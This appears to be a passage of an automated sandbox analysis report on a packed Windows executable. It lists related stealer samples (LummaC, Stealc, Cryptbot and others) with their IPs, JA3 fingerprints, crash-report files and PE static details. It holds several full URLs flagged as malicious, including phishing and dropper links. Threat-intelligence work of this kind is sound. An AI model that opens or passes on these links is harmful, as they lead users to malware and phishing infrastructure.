                                                                                                                                            U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 172.67.199.72
                                                                                                                                            ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.36.201
                                                                                                                                            skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.36.201
                                                                                                                                            bitbucket.orgpayment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 185.166.143.48
                                                                                                                                            FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.50
                                                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.48
                                                                                                                                            jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.48
                                                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.50
                                                                                                                                            5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            s3-w.us-east-1.amazonaws.compayment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 3.5.29.153
                                                                                                                                            FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 3.5.25.82
                                                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 3.5.29.90
                                                                                                                                            jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 52.216.152.124
                                                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 52.217.136.89
                                                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 16.182.101.249
                                                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 52.217.67.100
                                                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 52.217.18.140
                                                                                                                                            5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 52.217.203.57
                                                                                                                                            TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 3.5.16.86

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            AMAZON-AESUSpayment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 3.5.29.153
                                                                                                                                            FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 3.5.25.82
                                                                                                                                            dWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 3.5.29.90
                                                                                                                                            qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            NT3kfq4eeE.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                            • 34.226.108.155
                                                                                                                                            CLOUDFLARENETUSChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.199.72
                                                                                                                                            SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.18.95.41
                                                                                                                                            http://tax-com.comGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.203.198
                                                                                                                                            https://www.cocol88.site/l6v3z.phpGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.63.207
                                                                                                                                            https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.69.226
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.95.235
                                                                                                                                            AMAZON-02USChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 3.160.188.50
                                                                                                                                            Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 52.89.58.139
                                                                                                                                            https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                            • 44.226.126.181
                                                                                                                                            payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 185.166.143.48
                                                                                                                                            https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70Get hashmaliciousHtmlDropperBrowse
                                                                                                                                            • 13.56.148.153
                                                                                                                                            https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                            • 76.223.125.47
                                                                                                                                            R2-Signed.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                            • 18.139.89.40
                                                                                                                                            TsWpfWrp.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                            • 52.74.204.186
                                                                                                                                            Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                            • 3.5.232.230
                                                                                                                                            Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                            • 3.5.232.130

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145
                                                                                                                                            BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 185.166.143.49
                                                                                                                                            • 104.21.36.201
                                                                                                                                            • 3.5.25.145

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fr2Mul3G6m.exe_e78c5d4f5dfd87a3932e5fc37711339d0c7362_75472e24_ba12810e-8b64-451e-9bcd-cf073edceef1\Report.wer

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65536
                                                                                                                                            Entropy (8bit):1.0416952416721434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:92gFoyfOcT4ItKKsohroI7JfpQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1oVat:cgPLKKw0BU/AjudxQfzuiFXZ24IO8+3
                                                                                                                                            MD5:8F29B51263291958016E3C850450D517
                                                                                                                                            SHA1:FC8033C371A252C3F0CD293225DD0876C182E6B5
                                                                                                                                            SHA-256:F007DB5C605406CB65118A32C19B09E90206F98F4B5C6ED57563D611C972E358
                                                                                                                                            SHA-512:937C214A9FF8A07472465D40E994045A59B925304982C37F8B3EE911C1DC29BD7B7EA0356516355566C5B17C1E1FDECC80BE5DB0D0CDA649E8A4A09C879F1DDB
                                                                                                                                            Malicious:true
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.4.4.4.5.0.5.2.8.7.3.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.4.4.4.5.1.0.9.1.2.5.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.1.2.8.1.0.e.-.8.b.6.4.-.4.5.1.e.-.9.b.c.d.-.c.f.0.7.3.e.d.c.e.e.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.f.f.6.4.d.9.-.5.c.8.2.-.4.f.c.3.-.a.b.6.b.-.3.d.a.c.7.d.1.1.6.b.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.r.2.M.u.l.3.G.6.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.0.-.0.0.0.1.-.0.0.1.3.-.3.1.2.e.-.d.a.8.c.5.6.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.b.9.6.f.8.e.6.f.7.2.b.d.6.2.e.5.0.2.c.4.4.e.a.9.9.2.1.9.6.9.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.9.7.9.4.f.e.8.6.2.7.8.c.2.9.9.f.5.0.0.f.d.1.d.4.f.5.5.2.2.3.e.7.7.e.7.8.0.!.f.r.2.M.u.l.3.G.6.m...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAD1.tmp.dmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 16:20:50 2024, 0x1205a4 type
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290222
                                                                                                                                            Entropy (8bit):1.472325163878666
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:EE7vQ4BBljN/IbQUnN98zmGCxCArKPiZ8+TAxKe0fILkZ:F12QUNkmG7Ke0fILm
                                                                                                                                            MD5:9865B5CA5456539FFE423F43DE647009
                                                                                                                                            SHA1:C2CAB7C2A5ADBDF9BF5AD38DE4EF7C0DDFB4F8D7
                                                                                                                                            SHA-256:3F8AF74AD5D6961FFD824A76D670CEA7C838B43B3225DB6D2569AFB73B5C5395
                                                                                                                                            SHA-512:493165097544E7B29E0C6C82FDB24A9F91C962286AE69ABD18140C3CE2AC5ECA1EE46E6E87B63BC0C3EB002309A8ABA467FBED9BC6CB916B76B418862B31C2E7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MDMP..a..... ........ig....................................,....'......................`.......8...........T............K...!...........(...........*..............................................................................eJ......H+......GenuineIntel............T.......P.....ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC1A.tmp.WERInternalMetadata.xml

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8382
                                                                                                                                            Entropy (8bit):3.7031248096020497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:R6l7wVeJtV6D66YWgSUJi0gmfgTprZ89bEUsfoMm:R6lXJP6e6YhSURgmfgIEHfi
                                                                                                                                            MD5:29606F68A11652E025CC14D04AD1E996
                                                                                                                                            SHA1:7BEAF4D687C02EAF5985AB3176B37CF0A2B48B4F
                                                                                                                                            SHA-256:4116D9B7BE9943F968641A9F42482BBE17199E9234316D887862111D4888A720
                                                                                                                                            SHA-512:DD07BB8722E3D78154070113DDA061826937A53A30084F85800DA384A9A5AA161244A13736AFED6D4349ADA884795769E5673A4EC0EB2ACF078D39A81C3508C8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.4.8.<./.P.i.

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC4A.tmp.xml

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4624
                                                                                                                                            Entropy (8bit):4.496670537355202
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cvIwWl8zsQJg77aI9epWpW8VY9Ym8M4JdKcF6F+q8F6ooSf/FzHdnd:uIjfWI7sY7V5JSF6oMFzHdnd
                                                                                                                                            MD5:C5FE63316E1FAF358077C2C7CB4EB1D9
                                                                                                                                            SHA1:3D565874A5912DD0058C4F1E9075A6F2B5E93F04
                                                                                                                                            SHA-256:7FE308A56AC55BBA95A352D9034D414E862AEC47C9546891CCDD579F8A860F29
                                                                                                                                            SHA-512:21B6F42128092E53FA462CF502BDD770754D62573608DD6B6A1E2E7FBB7C0F060A64263B6C35F5E71011C0EA367E39C38A59E87FB71185BDA4884E64D017F4C7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="644123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1835008
                                                                                                                                            Entropy (8bit):4.295989833190322
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:l41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+YJmBMZJh1Vj9:y1/YCW2AoQ0NiSJwMHrVZ
                                                                                                                                            MD5:C03558224289C92C660F1A501650AFBD
                                                                                                                                            SHA1:69F9B5575B4007909810539D3980414334653E9B
                                                                                                                                            SHA-256:6E0354B73480F632DEABF5EFECFA48C5D6E7E822C6F9D6FF7AF78DB46F86908D
                                                                                                                                            SHA-512:0486706ADA06F8A34BB00E45C48B066B20D85D1E07CE2FBA85F4A8075380861FC7CECE73684882F1A81D1E9A90514FA34FF3A9FC022E8F711BC7415455438BF7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.8..VU..............................................................................................................................................................................................................................................................................................................................................bg..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):6.553547840586163
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:fr2Mul3G6m.exe
                                                                                                                                            File size:2'935'296 bytes
                                                                                                                                            MD5:5bb8a1264df6a69e4b6118482039c003
                                                                                                                                            SHA1:59e9794fe86278c299f500fd1d4f55223e77e780
                                                                                                                                            SHA256:9715a455350670d16eb95de41f06347c6d19fd27995dad20444517022ed90013
                                                                                                                                            SHA512:fa08666a0ea55ac9b791f7a097b958a9441d6f435647bbcf077ffab8d1d1753c94dca3e5a3d8d70d260e9202767f4b0b695962bdd6db9b3c3e2b3952cb62ec57
                                                                                                                                            SSDEEP:49152:5XIa6jjBvDIjuHboVkYhCDJyEi4M1T3blMKAc:54HP9UjNhCDJyEizbvAc
                                                                                                                                            TLSH:39D53B92A509B5CFD45F22B4972BCE82697D02B9073188DBDC19ACFE7E63CC115B9C24
                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.........................../.....hq-...@.................................T0..h..

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x6fa000
                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            jmp 00007FBF08E1DF1Ah
                                                                                                                                            push gs
                                                                                                                                            sub al, 00h
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            jmp 00007FBF08E1FF15h
                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax-6Ah], ah

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            0x10000x510000x248006a6508ab80341eca19b1c909ccf45dcbFalse0.9973445526541096data7.982637526766752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            dvyasulg0x540000x2a50000x2a480088c61629d449d68182e635574238da95unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            pfegkdjv0x2f90000x10000x6005066ce0076727771f61a5b984a26299aFalse0.578125data5.043724570733893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
